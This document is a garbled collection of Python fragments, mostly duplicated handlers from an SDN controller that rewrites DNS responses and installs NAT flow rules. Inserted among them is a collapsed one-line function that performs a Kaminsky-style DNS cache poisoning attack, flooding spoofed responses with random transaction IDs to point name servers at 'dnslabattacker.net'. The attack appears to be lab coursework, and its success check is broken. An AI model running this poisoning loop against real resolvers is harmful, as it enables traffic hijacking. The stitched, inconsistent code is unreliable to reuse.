def handle_packet(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)
dns = DNS(self._pkt[-1])
cs = self._controller.get_customers()
nsdomain = cs[0].get_ns_domain_name()
if dns.qr == 1 and dns.ar.rrname != cs[0].get_ns_domain_name():
dns.id = self._controller.get_transaction_id()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='00:aa:bb:00:0f:11',
dst=cs[0].get_next_hop_mac()))
new_pkt.add_protocol(
ipv4.ipv4(dst=cs[0].get_name_server(),
src=pkt_ip.src,
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
new_pkt.add_protocol(dns)
self.send_dns_response_packet(new_pkt, cs[0].get_datapath(),
cs[0].get_ingress_port())
if dns.qr == 1 and cs[0].get_ns_domain_name() == dns.ar.rrname:
#print '----------I am calling another controller------------'
self.send_dns_response_to_controller(self._pkt)
def handle_socket_msg(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)[0]
dns = DNS(self._pkt[-1])
#print '---- I received a response with ID----', dns.id
dnsrr = dns.an[0]
if dns.qr == 1:
pool = self._controller.get_pool_fittizio()
ip = IPNetwork(pool)
ip_list = list(ip)
cs = self._controller.get_customers()
customer_ip = cs[0].get_private_ip_subnet()
if IPAddress(dnsrr.rdata) in IPNetwork(customer_ip):
new_response = str(ip_list[1])
responseIP = dnsrr.rdata
myip = list(responseIP.split('.'))
index = myip[-1]
responseIP = str(ip_list[int(index)])
dns.ns[0].rrname = '.'
dns.ns[0].rrdata = '.'
dns.id = self._controller.get_transaction_id()
cs = self._controller.get_customers()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='10:00:00:00:10:ff',
dst=cs[0].get_next_hop_mac()))
new_pkt.add_protocol(
ipv4.ipv4(src=self._controller.get_packet_ip(),
dst=cs[0].get_name_server(),
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
dns.an[0].rdata = str(responseIP)
dns.ar[0].rdata = str(ip_list[1])
new_pkt.add_protocol(dns)
print(
'----------------The Number of Exchanged PACKETS between Controllers-----',
self._controller.get_packet_counter())
dnsrr = dns.an[0]
new_pkt.serialize()
self.send_dns_packet(new_pkt, cs[0].get_datapath(),
cs[0].get_ingress_port())
def exampleSendDNSQuery(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) dnsPacket = DNS(rd=1, qd=DNSQR(qname='example.com')) sendPacket(sock, dnsPacket, my_ip, my_port) response = sock.recv(4096) response = DNS(response) print "\n***** Packet Received from Remote Server *****" print response.show() print "***** End of Remote Server Packet *****\n" #build fake site for fake DNS and response hack = True while hack: fakeSite = getRandomSubDomain() + ".example.com" dnsPacket.qd.qname = fakeSite response.qd.qname = fakeSite response.aa = 1 response.an.rrname = fakeSite response.an.rdata = "1.2.3.4" #if response.nscount != 2: # if response.nscount > 2: # for j in range(2,response.nscount): # response.ns[j].rdata = None # response.nscount = 2 response.ns[0].rdata = "ns1.dnslabattacker.net" response.ns[1].rdata = "ns2.dnslabattacker.net" response.ar = None response.arcount = 0 sendPacket(sock, dnsPacket, my_ip, my_port) for i in range(100): response.id = getRandomTXID() sendPacket(sock, response, my_ip, my_query_port) testPacket = DNS(rd=1, qd=DNSQR(qname='example.com')) sendPacket(sock, testPacket, my_ip, my_port) testResp = sock.recv(4096) testResp = DNS(testResp) if testResp.ns[0].rdata == "ns1.dnslabattacker.net" or "ns2.dnslabattacker.net": hack = False
def handle_packet(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)
pkt_udp = self._pkt.get_protocols(udp.udp)
dns = DNS(self._pkt[-1])
dnsrr = dns.an[0]
csR = self._controller.get_customers_remote()
cs = self._controller.get_customers()
mac_list = []
cname = None
cr_name = []
cs_name = []
query = dnsrr.rrname.split('.')
eth = pkt_eth.src
new_query = query[1] + '.' + query[2]
dst_index = None
dst_index = self._controller.get_current_customer_id()
print(eth, '--------------dst-cust-----------',
self._controller.get_destination_customer())
#send the DNS response to remote controller if the customer is a reomte one
for i in range(len(cs)):
cs_name.append(cs[i].get_name())
print '-------cs-name----------------------------', cs_name, self._controller.get_destination_customer(
), '-------dns.qr----', dns.qr
current = self._controller.get_destination_customer()
if self._controller.get_destination_customer() is None and dns.qr == 1:
#if current is not None:
self.send_dns_response_to_controller(self._pkt)
#send the DNS response to customer ce if the customer is within the current controller ISP
#for c in range(len(cs)):
#if new_query in cs[c].get_name_server():
#cs_name.append(cs[c].get_name())
#dst_index=c
elif self._controller.get_destination_customer(
) is not None and dns.qr == 1:
#elif eth in mac_list and dst_index is not None:
print('------------------------cs index------------', dst_index)
responseIP = dnsrr.rdata
if dns.nscount >= 1:
dns.ns[0].rrname = 'ROOT-SERVER.'
dns.ns[0].rdata = '10.1.0.18'
if dns.arcount >= 1:
dns.ar.rrname = 'ROOT-SERVER.'
dns.ar.rdata = '10.1.0.18'
dns.id = self._controller.get_transaction_id()
cs = self._controller.get_customers()
#print'--len(cs)--',len(cs),'----------',cs[dst_index].get_next_hop_mac(),'-port-',self._controller.get_port_number()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='10:00:00:00:10:ff',
dst=cs[dst_index].get_next_hop_mac()))
#new_pkt.add_protocol(ipv4.ipv4(src='10.1.0.18',dst=cs[index1].get_name_server(),proto=17))
new_pkt.add_protocol(
ipv4.ipv4(src=IPAddress('10.1.0.18'),
dst=cs[dst_index].get_name_server(),
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
new_pkt.add_protocol(dns)
new_pkt.serialize()
#print'---final values ID=%i, cs-ID=%s, udp-port=%i'% (self._controller.get_transaction_id(),self._controller.get_current_customer_id(),self._controller.get_port_number())
self.send_dns_packet(new_pkt, cs[dst_index].get_datapath(),
cs[dst_index].get_ingress_port())
print '---------final pkt is sent--------------------------------------------'
def handle_packet(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)
dns = DNS(self._pkt[-1])
cs = self._controller.get_customers()
csR = self._controller.get_customers_remote()
cs_list = []
cr_list = []
name_customer = None
name_list = []
name_server_list = []
for c in range(len(cs)):
name_list.append(cs[c].get_name())
name_server_list.append(cs[c].get_name_server())
for c in range(len(csR)):
name = csR[c].get_name_server()
#print'--name--',name
cr_list.append(name[0])
if dns.ar.rrname == name[0]:
name_customer = csR[c].get_name()
index = self._controller.get_current_customer_id()
nsdomain = cs[index].get_ns_domain_name()
#print('--dns--',dns)
print('--name_server_list--', name_server_list)
print('--cs_list--', cs_list)
print('--cr_list--', cr_list)
print('--name_list--', name_list)
print('---name-customer--', name_customer, dns.ar.rrname)
for c in range(len(cs)):
if cs[c].get_name() == name_customer:
index_new = c
#print('-------dns.----',dns)
#if dns.qr==1 and dns.ar.rrname!=cs[0].get_ns_domain_name():
if dns.qr == 1 and dns.ar.rrname not in cr_list and name_customer is None:
dns.id = self._controller.get_transaction_id()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='00:aa:bb:00:0f:11',
dst=cs[index].get_next_hop_mac()))
new_pkt.add_protocol(
ipv4.ipv4(dst=cs[index].get_name_server(),
src=pkt_ip.src,
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
new_pkt.add_protocol(dns)
self.send_dns_response_packet(new_pkt, cs[index].get_datapath(),
cs[index].get_ingress_port())
elif dns.qr == 1 and name_customer in name_list:
print('---------SALAM-----------', index_new, pkt_ip)
dns.id = self._controller.get_transaction_id()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='00:aa:bb:00:0f:11',
dst=cs[index].get_next_hop_mac()))
new_pkt.add_protocol(
ipv4.ipv4(dst=cs[index].get_name_server(),
src=pkt_ip.src,
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
new_pkt.add_protocol(dns)
self.send_dns_response_packet(new_pkt, cs[index].get_datapath(),
cs[index].get_ingress_port())
if dns.qr == 1 and dns.ar.rrname in cr_list and name_customer not in name_list:
print '----------I am calling another controller------------'
self.send_dns_response_to_controller(self._pkt)
def handle_socket_msg(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)[0]
dns = DNS(self._pkt[-1])
print '---- I received final DNS answer----', dns.id
dnsrr = dns.an[0]
if dns.qr == 1 and self._controller.get_transaction_id() is not None:
pool = self._controller.get_pool_fittizio()
ip = IPNetwork(pool)
ip_list = list(ip)
cs = self._controller.get_customers()
index1 = self._controller.get_current_customer_id()
customer_ip = cs[index1].get_private_ip_subnet()
print('---------INDEX--', index1)
#if IPAddress(dnsrr.rdata) in IPNetwork(customer_ip):
if IPAddress(dnsrr.rdata) is not None:
new_response = str(ip_list[1])
responseIP = dnsrr.rdata
if IPAddress(responseIP) in IPNetwork(
cs[index1].get_private_ip_subnet()):
myip = list(responseIP.split('.'))
index = myip[-1]
responseIP = str(ip_list[int(index)])
dns.ns[0].rrname = '.'
dns.ns[0].rrdata = '.'
dns.id = self._controller.get_transaction_id()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='10:00:00:00:10:ff',
dst=cs[int(index1)].get_next_hop_mac()))
new_pkt.add_protocol(
ipv4.ipv4(src=self._controller.get_packet_ip(),
dst=cs[int(index1)].get_name_server(),
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
dns.an[0].rdata = str(responseIP)
dns.ar[0].rdata = str(ip_list[1])
print('-----FINAL DNS-----', dns)
new_pkt.add_protocol(dns)
print(
'----------------The Number of Exchanged PACKETS between Controllers-----',
self._controller.get_packet_counter())
dnsrr = dns.an[0]
new_pkt.serialize()
self.send_dns_packet(new_pkt, cs[int(index1)].get_datapath(),
cs[int(index1)].get_ingress_port())
#A rule to change the change made by SDNS to original one-->fake private ip address to real private ip address
#find dst fake private ip and then create the original private ip--> the opposite of SDNS
dns = DNS(self._pkt[-1])
dnsrr = dns.an[0]
rIP = responseIP
print '------get_pool_fittizio--------', self._controller.get_pool_fittizio(
), responseIP
if IPAddress(responseIP) in IPNetwork(
self._controller.get_pool_fittizio()):
pool = cs[index1].get_private_ip_subnet()
ip = IPNetwork(pool)
ip_list = list(ip)
myip = list(rIP.split('.'))
index = myip[-1]
rIP = str(ip_list[int(index)])
datapath = cs[index1].get_datapath()
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
print '-------NAT IP after SDNS----', rIP
match_fake = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
ipv4_dst=(responseIP))
actions_fake = [
parser.OFPActionSetField(ipv4_dst=rIP),
parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)
]
inst_fake = [
parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions_fake)
]
mod_fake = parser.OFPFlowMod(datapath=datapath,
match=match_fake,
instructions=inst_fake,
priority=150)
datapath.send_msg(mod_fake)
def handle_socket_msg(self):
pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
pkt_udp = self._pkt.get_protocols(udp.udp)[0]
dns = DNS(self._pkt[-1])
#print '--------I received a response with ID-------', dns.id
dnsrr = dns.an[0]
index1 = self._controller.get_current_customer_id()
if dns.qr == 1 and index1 is not None and self._controller.get_destination_customer(
) is None and self._controller.get_port_number() is not None:
pool = self._controller.get_pool_fittizio()
ip = IPNetwork(pool)
ip_list = list(ip)
#print( '-----pkt--------',self._pkt)
cs = self._controller.get_customers()
#for c in range(len(cs)):
#if
print('------------------------cs index------------', index1)
#customer_ip=cs[index1].get_private_ip_subnet()
#responseIP=dnsrr.rdata
#if IPAddress(dnsrr.rdata) in IPNetwork(customer_ip):
if dnsrr.rdata is not None:
new_response = str(ip_list[1])
responseIP = dnsrr.rdata
responseIP2 = dnsrr.rdata
#check wheather the response IP overlaps with src or not? if so, do NAT
if IPAddress(responseIP) in IPNetwork(
cs[index1].get_private_ip_subnet()):
myip = list(responseIP.split('.'))
index = myip[-1]
responseIP = str(ip_list[int(index)])
#print('--DNS before---',dns)
if dns.nscount >= 1:
dns.ns[0].rrname = 'ROOT-SERVER.'
dns.ns[0].rdata = '10.1.0.18'
if dns.arcount >= 1:
dns.ar.rrname = 'ROOT-SERVER.'
dns.ar.rdata = '10.1.0.18'
dns.id = self._controller.get_transaction_id()
cs = self._controller.get_customers()
print '--len(cs)--', len(
cs), '----------', cs[index1].get_next_hop_mac(
), '-port-', self._controller.get_port_number()
new_pkt = packet.Packet()
new_pkt.add_protocol(
ethernet.ethernet(src='10:00:00:00:10:ff',
dst=cs[index1].get_next_hop_mac()))
#new_pkt.add_protocol(ipv4.ipv4(src='10.1.0.18',dst=cs[index1].get_name_server(),proto=17))
new_pkt.add_protocol(
ipv4.ipv4(src=IPAddress('10.1.0.18'),
dst=cs[index1].get_name_server(),
proto=17))
new_pkt.add_protocol(
udp.udp(src_port=53,
dst_port=self._controller.get_port_number()))
#new_dns=DNS(rd=0,id=pkt_dns.id,qd=DNSQR(qname=dns.qd.qname),ns=DNSRR(rrname=dns.ar.rrname,type=1,ttl=60000,rdata=cs[index1].get_name_server()))
#new_pkt.add_protocol(new_dns)
dns.an[0].rdata = str(responseIP)
#dns1=DNS(rd=0, id=dns.id, qr=1L, qd=dns.qd, ancount=1, nscount=1, arcount=1, an=(DNSRR(rrname=dnsrr.rrname, type='A', rclass='IN', ttl=60000, rdata=str(responseIP))), ns=(DNSRR(rrname='ROOT-SERVER.', type='NS',rclass='IN', ttl=3600, rdata='.')), ar=DNSRR(rrname='ROOT-SERVER.', type='A', rclass='IN' ,ttl=60000, rdata='10.1.0.18'))
#print('-----FINAL DNS-----',dns)
new_pkt.add_protocol(dns)
new_pkt.serialize()
#print('--akher packet---',new_pkt)
#print'---final values ID=%i, cs-ID=%s, udp-port=%i'% (self._controller.get_transaction_id(),self._controller.get_current_customer_id(),self._controller.get_port_number())
self.send_dns_packet(new_pkt, cs[index1].get_datapath(),
cs[index1].get_ingress_port())
print '---------final pkt is sent--------------------------------------------'
#A rule to change the change made by SDNS to original one-->fake private ip address to real private ip address
#find dst fake private ip and then create the original private ip--> the opposite of SDNS
dns = DNS(self._pkt[-1])
dnsrr = dns.an[0]
rIP = responseIP
print '------get_pool_fittizio--------', self._controller.get_pool_fittizio(
), responseIP
if IPAddress(responseIP) in IPNetwork(
self._controller.get_pool_fittizio()):
pool = cs[index1].get_private_ip_subnet()
ip = IPNetwork(pool)
ip_list = list(ip)
myip = list(rIP.split('.'))
index = myip[-1]
rIP = str(ip_list[int(index)])
datapath = cs[index1].get_datapath()
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
print '-------NAT IP after SDNS----', rIP
match_fake = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
ipv4_dst=(responseIP))
actions_fake = [
parser.OFPActionSetField(ipv4_dst=rIP),
parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)
]
inst_fake = [
parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions_fake)
]
mod_fake = parser.OFPFlowMod(datapath=datapath,
match=match_fake,
instructions=inst_fake,
priority=150)
datapath.send_msg(mod_fake)